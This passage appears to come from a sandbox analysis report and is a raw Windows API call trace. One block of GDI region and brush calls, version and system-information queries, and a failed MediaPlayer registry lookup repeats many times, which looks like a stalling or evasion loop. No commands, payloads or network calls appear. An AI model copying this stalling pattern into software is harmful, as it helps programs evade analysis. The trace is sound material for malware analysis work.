x2=0, y2=0) returned 0x1040d27 [0017.763] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d28 [0017.763] CombineRgn (hrgnDst=0x1040d27, hrgnSrc1=0x1b04027d, hrgnSrc2=0x25040713, iMode=1) returned 1 [0017.763] CombineRgn (hrgnDst=0x1040d28, hrgnSrc1=0x1b04027d, hrgnSrc2=0x25040713, iMode=4) returned 2 [0017.763] CreateSolidBrush (color=0xff) returned 0x2100d26 [0017.763] CreateSolidBrush (color=0xff0000) returned 0x1100d29 [0017.763] DeleteObject (ho=0x1100d29) returned 1 [0017.763] DeleteObject (ho=0x25040713) returned 1 [0017.763] DeleteObject (ho=0x1b04027d) returned 1 [0017.763] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.763] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.764] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.764] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.764] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.764] BeginPath (hdc=0x0) returned 0 [0017.764] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.764] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.764] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.764] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.764] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.764] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.764] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.764] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.764] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x26040713 [0017.764] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1c04027d [0017.764] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d2a [0017.764] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d2b [0017.764] CombineRgn (hrgnDst=0x1040d2a, hrgnSrc1=0x26040713, hrgnSrc2=0x1c04027d, iMode=1) returned 1 [0017.764] CombineRgn (hrgnDst=0x1040d2b, hrgnSrc1=0x26040713, hrgnSrc2=0x1c04027d, iMode=4) returned 2 [0017.764] CreateSolidBrush (color=0xff) returned 0x2100d29 [0017.764] CreateSolidBrush (color=0xff0000) returned 0x1100d2c [0017.764] DeleteObject (ho=0x1100d2c) returned 1 [0017.765] DeleteObject (ho=0x1c04027d) returned 1 [0017.765] DeleteObject (ho=0x26040713) returned 1 [0017.765] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.765] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.765] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.765] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.765] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.765] BeginPath (hdc=0x0) returned 0 [0017.765] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.765] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.765] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.765] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.765] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.765] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.765] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.765] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.765] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1d04027d [0017.765] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x27040713 [0017.765] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d2d [0017.765] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d2e [0017.765] CombineRgn (hrgnDst=0x1040d2d, hrgnSrc1=0x1d04027d, hrgnSrc2=0x27040713, iMode=1) returned 1 [0017.765] CombineRgn (hrgnDst=0x1040d2e, hrgnSrc1=0x1d04027d, hrgnSrc2=0x27040713, iMode=4) returned 2 [0017.765] CreateSolidBrush (color=0xff) returned 0x2100d2c [0017.765] CreateSolidBrush (color=0xff0000) returned 0x1100d2f [0017.765] DeleteObject (ho=0x1100d2f) returned 1 [0017.765] DeleteObject (ho=0x27040713) returned 1 [0017.765] DeleteObject (ho=0x1d04027d) returned 1 [0017.765] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.765] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.766] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.766] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.766] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.766] BeginPath (hdc=0x0) returned 0 [0017.766] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.766] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.766] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.766] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.766] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.766] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.766] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.766] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.766] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x28040713 [0017.766] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1e04027d [0017.766] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d30 [0017.766] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d31 [0017.766] CombineRgn (hrgnDst=0x1040d30, hrgnSrc1=0x28040713, hrgnSrc2=0x1e04027d, iMode=1) returned 1 [0017.766] CombineRgn (hrgnDst=0x1040d31, hrgnSrc1=0x28040713, hrgnSrc2=0x1e04027d, iMode=4) returned 2 [0017.766] CreateSolidBrush (color=0xff) returned 0x2100d2f [0017.766] CreateSolidBrush (color=0xff0000) returned 0x1100d32 [0017.766] DeleteObject (ho=0x1100d32) returned 1 [0017.766] DeleteObject (ho=0x1e04027d) returned 1 [0017.766] DeleteObject (ho=0x28040713) returned 1 [0017.766] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.766] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.766] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.767] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.767] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.767] BeginPath (hdc=0x0) returned 0 [0017.767] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.767] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.767] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.767] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.767] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.767] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.767] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.767] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.767] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1f04027d [0017.767] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x29040713 [0017.767] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d33 [0017.767] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d34 [0017.767] CombineRgn (hrgnDst=0x1040d33, hrgnSrc1=0x1f04027d, hrgnSrc2=0x29040713, iMode=1) returned 1 [0017.767] CombineRgn (hrgnDst=0x1040d34, hrgnSrc1=0x1f04027d, hrgnSrc2=0x29040713, iMode=4) returned 2 [0017.767] CreateSolidBrush (color=0xff) returned 0x2100d32 [0017.767] CreateSolidBrush (color=0xff0000) returned 0x1100d35 [0017.767] DeleteObject (ho=0x1100d35) returned 1 [0017.767] DeleteObject (ho=0x29040713) returned 1 [0017.767] DeleteObject (ho=0x1f04027d) returned 1 [0017.767] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.767] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.767] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.767] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.767] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.767] BeginPath (hdc=0x0) returned 0 [0017.767] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.768] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.768] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.768] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.768] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.768] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.768] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.768] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.768] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2a040713 [0017.768] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2004027d [0017.768] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d36 [0017.768] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d37 [0017.768] CombineRgn (hrgnDst=0x1040d36, hrgnSrc1=0x2a040713, hrgnSrc2=0x2004027d, iMode=1) returned 1 [0017.768] CombineRgn (hrgnDst=0x1040d37, hrgnSrc1=0x2a040713, hrgnSrc2=0x2004027d, iMode=4) returned 2 [0017.768] CreateSolidBrush (color=0xff) returned 0x2100d35 [0017.768] CreateSolidBrush (color=0xff0000) returned 0x1100d38 [0017.768] DeleteObject (ho=0x1100d38) returned 1 [0017.768] DeleteObject (ho=0x2004027d) returned 1 [0017.768] DeleteObject (ho=0x2a040713) returned 1 [0017.768] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.768] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.768] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.768] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.768] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.768] BeginPath (hdc=0x0) returned 0 [0017.768] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.768] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.768] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.768] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.768] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.768] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.769] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.769] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.769] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2104027d [0017.769] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2b040713 [0017.769] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d39 [0017.769] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d3a [0017.769] CombineRgn (hrgnDst=0x1040d39, hrgnSrc1=0x2104027d, hrgnSrc2=0x2b040713, iMode=1) returned 1 [0017.769] CombineRgn (hrgnDst=0x1040d3a, hrgnSrc1=0x2104027d, hrgnSrc2=0x2b040713, iMode=4) returned 2 [0017.769] CreateSolidBrush (color=0xff) returned 0x2100d38 [0017.769] CreateSolidBrush (color=0xff0000) returned 0x1100d3b [0017.769] DeleteObject (ho=0x1100d3b) returned 1 [0017.769] DeleteObject (ho=0x2b040713) returned 1 [0017.769] DeleteObject (ho=0x2104027d) returned 1 [0017.769] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.769] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.769] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.769] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.769] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.769] BeginPath (hdc=0x0) returned 0 [0017.769] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.769] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.769] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.769] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.769] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.769] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.769] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.770] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.770] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2c040713 [0017.770] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2204027d [0017.770] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d3c [0017.770] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d3d [0017.770] CombineRgn (hrgnDst=0x1040d3c, hrgnSrc1=0x2c040713, hrgnSrc2=0x2204027d, iMode=1) returned 1 [0017.770] CombineRgn (hrgnDst=0x1040d3d, hrgnSrc1=0x2c040713, hrgnSrc2=0x2204027d, iMode=4) returned 2 [0017.770] CreateSolidBrush (color=0xff) returned 0x2100d3b [0017.770] CreateSolidBrush (color=0xff0000) returned 0x1100d3e [0017.770] DeleteObject (ho=0x1100d3e) returned 1 [0017.770] DeleteObject (ho=0x2204027d) returned 1 [0017.770] DeleteObject (ho=0x2c040713) returned 1 [0017.770] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.770] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.770] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.770] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.770] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.770] BeginPath (hdc=0x0) returned 0 [0017.770] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.770] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.770] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.770] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.770] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.770] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.770] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.770] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.771] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2304027d [0017.771] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2d040713 [0017.771] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d3f [0017.771] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d40 [0017.771] CombineRgn (hrgnDst=0x1040d3f, hrgnSrc1=0x2304027d, hrgnSrc2=0x2d040713, iMode=1) returned 1 [0017.771] CombineRgn (hrgnDst=0x1040d40, hrgnSrc1=0x2304027d, hrgnSrc2=0x2d040713, iMode=4) returned 2 [0017.771] CreateSolidBrush (color=0xff) returned 0x2100d3e [0017.771] CreateSolidBrush (color=0xff0000) returned 0x1100d41 [0017.771] DeleteObject (ho=0x1100d41) returned 1 [0017.771] DeleteObject (ho=0x2d040713) returned 1 [0017.771] DeleteObject (ho=0x2304027d) returned 1 [0017.771] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.771] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.771] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.771] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.771] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.771] BeginPath (hdc=0x0) returned 0 [0017.771] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.771] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.771] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.771] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.771] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.771] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.771] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.771] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.772] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2e040713 [0017.772] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2404027d [0017.772] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d42 [0017.772] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d43 [0017.772] CombineRgn (hrgnDst=0x1040d42, hrgnSrc1=0x2e040713, hrgnSrc2=0x2404027d, iMode=1) returned 1 [0017.772] CombineRgn (hrgnDst=0x1040d43, hrgnSrc1=0x2e040713, hrgnSrc2=0x2404027d, iMode=4) returned 2 [0017.772] CreateSolidBrush (color=0xff) returned 0x2100d41 [0017.772] CreateSolidBrush (color=0xff0000) returned 0x1100d44 [0017.772] DeleteObject (ho=0x1100d44) returned 1 [0017.772] DeleteObject (ho=0x2404027d) returned 1 [0017.772] DeleteObject (ho=0x2e040713) returned 1 [0017.772] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.772] GetSystemInfo (in: lpSystemInfo=0x1817e8 | 